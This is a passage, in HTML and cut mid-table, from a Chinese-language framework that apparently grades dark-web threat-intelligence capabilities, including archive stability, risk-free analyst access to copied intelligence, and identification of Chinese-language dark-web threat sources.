leaf="">。通过设定合理的分级标准，确保该指标能够客观反映</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">情报长期可用性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">上的实际差距。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">6.3.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">持久化存档稳定性以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">对原始情报的长期存档稳定性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">和</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">对原始情报源的依赖程度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为主要量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="122" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="353" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="93" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="122" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">持久化存档稳定性</span></span></p></td><td data-colwidth="353" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">仅对威胁信息或消息文本进行基本存档，详细内容依赖原始情报源</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="353" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">对原始情报的文本和消息内容进行长期持久化存档，多媒体部分依赖原始情报源</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="353" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">对高保真复制的原始情报进行长期稳定持久化存档，有效应对威胁源波动、查封或下线风险</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估对高保真复制后的原始情报进行长期安全存档的能力。通过量化存档稳定性和对原始情报源的依赖程度，可客观反映应对暗网威胁源波动时的持久化能力，为情报的长期可用性和历史追溯提供重要技术支撑。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">6.4.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">风险控制与使用便利性</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">6.4.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">风险控制与便利性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">是暗网情报高保真复制和持久化存档能力的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">重要应用</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，其核心设计初衷是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">为用户提供安全便捷的情报分析环境</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网原始情报的访问通常需要</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">使用 Tor 网络、注册暗网账号或进行其他高风险操作</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，这不仅增加了用户自身的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">风险</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，还显著降低了情报使用的便捷性。若无法有效平衡风险控制与使用便利，会限制情报的实际应用价值，影响安全团队的日常研判和响应效率。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，该指标重点考察通过高保真复制技术实现的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">用户零暴露、零注册访问能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，直接关系到情报使用的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">安全性和实用性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为暗网情报应用提供</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">低风险、高便利</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的技术支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">6.4.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标的设计依据主要结合</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">暗网情报使用的实际环境</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">用户需求</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">该技术的重要性体现在两个方面。首先，由于Tor网络本身的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">不稳定性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，以及大量黑客论坛、交易市场等威胁源均需要</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">注册会员</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">或</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">缴纳会费</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">才能访问核心情报内容，导致传统情报分析工作面临</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">极大的不便</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。其次，暗网环境充斥着</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">巨大风险</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，无论是注册时的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">身份暴露</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">、缴费过程中</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">个人隐私泄露</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，还是暗网中可能存在的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">病毒、恶意程序</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等，都可能让直接访问者面临</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">严重的潜在威胁</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本框架以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">风险控制与便利性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为量化标准，重点评估通过高保真复制技术实现的用户</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">零暴露、零注册访问能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，从而为暗网情报应用提供</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">低风险、高便利</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的技术支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">6.4.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">风险控制与便利性以用户访问原始情报的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">安全性和便捷程度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为主要量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="107" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="368" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="93" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="107" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">风险控制与便利性</span></span></p></td><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">用户仅能获取基本消息，查看具体原始情报内容时需登录原始地址</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">用户无需使用Tor网络或APP即可查看主要情报内容，但查看附件或多媒体元素时需登录原始地址</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">用户无需使用Tor网络或任何其他APP、无需注册或购买账号，即可安全、便捷地查看原始情报</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估通过高保真复制技术为用户提供的风险控制与便利性水平。通过量化用户访问原始情报的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">安全性和便捷程度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，可客观反映在实际应用场景中的可用性，为暗网情报分析提供低风险、高效率的技术支撑。</span></span></p><h1 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">第七章 </span></span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">中文暗网生态环境威胁识别能力</span></span></strong></span></h1><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">中文暗网生态是以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">中文</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">为核心交互语言，依托传统匿名网络与加密通信工具构建，具备</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">本土化、圈层化、高指向性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">特征的地下威胁生态，是国内数据泄露交易、IAB 买卖、侵公类活动、勒索软件通告、黑灰产协同运作的主要承载场景。该生态呈现</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">中文 Traditional Dark Web</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">中文 Dark Web Lite</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">并行共生、境内外联动的格局，威胁行为更贴合本土监管环境与机构运行特征，识别难度与治理价值显著高于通用暗网生态。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本章立足中文暗网生态的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">语言专属特性、本土威胁场景</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">侵公类风险高发</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等核心特征，从中文 Traditional Dark Web 识别、中文 Dark Web Lite 识别、侵公威胁源识别三个维度，构建中文暗网生态环境威胁识别能力量化评估体系，用以全面衡量对本土地下威胁的精准发现、专属适配与深度研判能力，为暗网情报体系的本土化落地、全域威胁感知与合规治理提供</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">专属化、可量化、可核验</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的能力依据。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">7.1.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">中文 Traditional Dark Web 识别</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">7.1.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">中文 Traditional Dark Web 识别能力，是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">中文暗网生态环境威胁识别能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">基础性核心指标</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。本指标核心设计目的，在于对面向中国境内的网络安全相关网络犯罪生态范畴内 Traditional Dark Web 威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">识别能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">覆盖程度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">开展评估。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">相较于国际通用暗网生态，中文 Traditional Dark Web 具备显著的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">本土化特征</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">复杂语境属性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。若无法对该类本土化威胁源实现有效识别与全域覆盖，则难以发现针对中国境内主体的定向威胁活动，易形成情报覆盖盲区，进而削弱风险预警工作的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">及时性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">完整性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本指标重点考察对中文 Traditional Dark Web 主要威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">识别深度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，该项能力直接决定本土化暗网威胁场景下情报获取的有效性，可为后续威胁分析、风险预警与应急处置工作提供</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">具备针对性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的数据支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">7.1.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标的设计依据，主要结合</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">中文 Traditional Dark Web</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源的实际分布特征与情报价值进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">在英文体系黑客论坛及勒索组织载体中，面向中国境内的泄露事件发布行为通常较为零散且非定期，缺乏</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">系统性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">持续性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。而中文暗网交易市场呈现</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">大量、高频</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">发布境内相关数据的显著特征，已成为境内网络安全相关网络犯罪生态的重要</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">集散地</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本框架以面向中国境内的网络安全相关网络犯罪生态范畴内 Traditional Dark Web 威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">识别深度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为量化标准，重点评估对本土化暗网威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">覆盖能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。通过设定科学合理的分级标准，确保该指标能够客观反映主体在中文 Traditional Dark Web 识别维度的实际能力差异。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">7.1.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">中文 Traditional Dark Web 识别以面向中国境内的网络安全相关网络犯罪生态暗网威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">覆盖深度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为主要量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="107" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="368" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="93" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="107" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p 